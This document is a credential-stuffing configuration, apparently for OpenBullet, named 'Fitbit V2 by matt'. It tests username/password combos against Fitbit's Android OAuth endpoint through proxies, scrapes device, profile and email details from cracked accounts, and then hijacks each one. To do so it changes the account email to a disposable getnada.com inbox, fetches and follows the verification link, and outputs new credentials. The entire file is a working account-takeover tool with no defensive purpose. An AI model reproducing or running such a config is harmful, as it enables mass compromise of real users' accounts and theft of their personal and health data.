[SETTINGS]
{
  "Name": "Fitbit V2 by matt",
  "SuggestedBots": 50,
  "MaxCPM": 0,
  "LastModified": "2019-06-26T23:02:36.3753385+02:00",
  "AdditionalInfo": "",
  "Author": "matt",
  "Version": "1.3.2 [Anomaly]",
  "LoliSave": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#Login REQUEST POST "https://android-api.fitbit.com/oauth2/token" 
  CONTENT "grant_type=password&client_id=2295XJ&username=<USER>&password=<PASS>&scope=activity%20heartrate%20location%20nutrition%20profile%20settings%20sleep%20social%20weight&expires_in=31536000" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#Check KEYCHECK 
  KEYCHAIN Success OR 
    KEY "access_token\":\"" 
  KEYCHAIN Failure OR 
    KEY "success\":false" 

#UserID PARSE "<SOURCE>" LR "user_id\":\"" "\"" -> VAR "UserID" 

#Token PARSE "<SOURCE>" LR "access_token\":\"" "\",\"" -> VAR "Token" 

#Capture REQUEST GET "https://android-api.fitbit.com/1/user/<UserID>/devices.json?https://android-api.fitbit.com/1/user/<UserID>/devices.json" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "Authorization: Bearer <Token>" 

#Device PARSE "<SOURCE>" LR "deviceVersion\":\"" "\",\"" -> CAP "Device" 

#Device_Edition PARSE "<SOURCE>" LR ",\"deviceEdition\":\"" "\",\"" -> CAP "Device Edition" 

FUNCTION ToUppercase "<Device Edition>" -> CAP "Device Edition" 

#Last_Sync PARSE "<SOURCE>" LR "lastSyncTime\":\"" "T" -> CAP "Last Sync" 

#Check KEYCHECK 
  KEYCHAIN Custom "FREE" OR 
    KEY "<SOURCE>" DoesNotContain "\",\"batteryLevel\":" 
  KEYCHAIN Success OR 
    KEY "\",\"batteryLevel\":" 

#Capture REQUEST GET "https://android-api.fitbit.com/1/user/<UserID>/profile.json?https://android-api.fitbit.com/1/user/<UserID>/profile.json" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "Authorization: Bearer <Token>" 

#Name PARSE "<SOURCE>" LR "fullName\":\"" "\"," -> CAP "Name" 

#Joined PARSE "<SOURCE>" LR "memberSince\":\"" "\",\"" -> CAP "Joined" 

#Verified PARSE "<SOURCE>" LR "emailVerificationRequired\":" ",\"" -> CAP "Verified" 

#Email_Address PARSE "<SOURCE>" LR "\",\"email\":\"" "@" -> VAR "Email" 

#ToLower FUNCTION ToLowercase "<Email>" -> VAR "Email" 

FUNCTION Replace "false" "Yes" "<Verified>" -> CAP "Verified" 

FUNCTION Replace "true" "No" "<Verified>" -> CAP "Verified" 

#Get_Email REQUEST GET "https://getnada.com/api/v1/inboxes/<Email>@getnada.com" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#ID PARSE "<SOURCE>" LR "\"uid\":\"" "\",\"" -> VAR "ID" 

#Change_Email REQUEST POST "https://android-api.fitbit.com/1/account/change-email.json " 
  CONTENT "email=<Email>@getnada.com&password=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "Authorization: Bearer <Token>" 

#Check KEYCHECK 
  KEYCHAIN Custom "2FACTOR" OR 
    KEY "youll need to wait" 
  KEYCHAIN Success OR 
    KEY "com.fitbit.app.login.error.email_pendingChange" 
    KEY "{\"success\":\"" 

#Read REQUEST GET "https://getnada.com/api/v1/messages/clpryOwpxzF3SrP7qRLThXKZwjTAkc" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#Url PARSE "<SOURCE>" LR "Just copy and paste this link into your browser: <br /> " "\\n" -> VAR "Url" 

#Verify REQUEST GET "<Url>" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#Check KEYCHECK 
  KEYCHAIN Ban OR 
    KEY "We were unable to verify your email. Please log in." 
  KEYCHAIN Success OR 
    KEY "Your email address has been verified." 

#Final_Login PARSE "<Email>" LR "" "" -> VAR "Final Login" 

#Fix FUNCTION Replace "<Email>" "<Email>@getnada.com:<PASS>" "<Final Login>" -> CAP "Final Login" 

